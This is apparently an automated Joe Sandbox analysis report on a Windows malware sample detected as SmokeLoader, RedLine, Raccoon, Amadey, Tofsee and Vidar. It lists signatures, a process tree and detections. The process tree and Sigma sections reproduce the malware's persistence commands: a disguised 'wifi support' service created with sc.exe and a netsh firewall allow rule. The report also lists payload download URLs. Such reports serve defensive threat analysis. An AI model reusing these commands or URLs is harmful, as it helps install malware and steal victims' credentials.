Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report sbxGIUIhRd.exe

Overview

General Information

Sample Name:sbxGIUIhRd.exe
Analysis ID:553170
MD5:f768f4a81e8b87d6990895a35b8d7d6c
SHA1:d0e5c1e975ec41e222f99f7a235d85317a1be3a7
SHA256:164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • sbxGIUIhRd.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\sbxGIUIhRd.exe" MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • sbxGIUIhRd.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\sbxGIUIhRd.exe" MD5: F768F4A81E8B87D6990895A35B8D7D6C)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 8A6B.exe (PID: 6760 cmdline: C:\Users\user\AppData\Local\Temp\8A6B.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 95C6.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\95C6.exe MD5: F768F4A81E8B87D6990895A35B8D7D6C)
          • 95C6.exe (PID: 6804 cmdline: C:\Users\user\AppData\Local\Temp\95C6.exe MD5: F768F4A81E8B87D6990895A35B8D7D6C)
        • CFE8.exe (PID: 4296 cmdline: C:\Users\user\AppData\Local\Temp\CFE8.exe MD5: E1AF41681888A847863EE17BD63450A0)
        • E2A6.exe (PID: 4752 cmdline: C:\Users\user\AppData\Local\Temp\E2A6.exe MD5: E4B33586BFDB5A9CD45F3038B8F4CCBD)
          • cmd.exe (PID: 5768 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4692 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • extd.exe (PID: 5016 cmdline: C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" MD5: 139B5CE627BC9EC1040A91EBE7830F7C)
          • sc.exe (PID: 4044 cmdline: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 240 cmdline: C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1740 cmdline: "C:\Windows\System32\sc.exe" start txlhcyih MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6536 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • FA5C.exe (PID: 796 cmdline: C:\Users\user\AppData\Local\Temp\FA5C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • FA5C.exe (PID: 1496 cmdline: C:\Users\user\AppData\Local\Temp\FA5C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 7D38.exe (PID: 6752 cmdline: C:\Users\user\AppData\Local\Temp\7D38.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 96DB.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\96DB.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
        • A15C.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\A15C.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
          • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6316 cmdline: C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\63DC.bat C:\Users\user\AppData\Local\Temp\A15C.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6228 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • adijaeg (PID: 6604 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • adijaeg (PID: 4204 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6868 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • gaystiqf.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe" MD5: 6D07EFE4270BD10431D8E32CADCFF4E7)
    • svchost.exe (PID: 5288 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • adijaeg (PID: 7148 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • adijaeg (PID: 6424 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000030.00000002.933969192.0000000000650000.00000040.00000001.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
              0000002E.00000003.893800912.00000000026D7000.00000004.00000040.sdmpJoeSecurity_BatToExeYara detected BatToExe compiled binaryJoe Security
                Click to see the 43 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                16.2.95C6.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  1.0.sbxGIUIhRd.exe.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    19.2.E2A6.exe.560e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      39.0.FA5C.exe.400000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        39.0.FA5C.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          Click to see the 30 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Suspect Svchost ActivityShow sources
                          Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe", ParentImage: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe, ParentProcessId: 4588, ProcessCommandLine: svchost.exe, ProcessId: 5288
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, ProcessId: 4692
                          Sigma detected: Suspicious Svchost ProcessShow sources
                          Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe", ParentImage: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe, ParentProcessId: 4588, ProcessCommandLine: svchost.exe, ProcessId: 5288
                          Sigma detected: Netsh Port or Application AllowedShow sources
                          Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6536
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4044

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://81.163.30.181/1.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dllAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\gaystiqf.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: sbxGIUIhRd.exeVirustotal: Detection: 36%Perma Link
                          Source: sbxGIUIhRd.exeReversingLabs: Detection: 48%
                          Multi AV Scanner detection for domain / URLShow sources
                          Source: http://185.215.113.35/d2VxjasuwS/index.php?scr=1Virustotal: Detection: 12%Perma Link
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7D38.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\7D38.exeReversingLabs: Detection: 76%
                          Machine Learning detection for sampleShow sources
                          Source: sbxGIUIhRd.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\adijaegJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\B3EB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\96DB.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\CF17.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\BBBC.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\7D38.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\C487.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\gaystiqf.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeJoe Sandbox ML: detected
                          Source: 18.3.CFE8.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 19.2.E2A6.exe.560e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 18.2.CFE8.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 38.3.svchost.exe.284d000.3.unpackAvira: Label: TR/Patched.Gen
                          Source: 35.2.gaystiqf.exe.630e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 35.3.gaystiqf.exe.650000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 19.3.E2A6.exe.580000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 19.2.E2A6.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 35.2.gaystiqf.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 38.2.svchost.exe.2360000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 35.2.gaystiqf.exe.850000.2.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: 38.3.svchost.exe.284d000.4.unpackAvira: Label: TR/Patched.Gen
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006376C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00634A80 CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00637760 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006373E0 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006379F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeUnpacked PE file: 18.2.CFE8.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeUnpacked PE file: 19.2.E2A6.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeUnpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack
                          Source: sbxGIUIhRd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49791 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49810 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.771800332.0000000001127000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.770525500.0000000005019000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.772754936.0000000001121000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: MUC:\des.pdbh source: sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbz:^^ source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdby2V] source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbv source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb^ source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
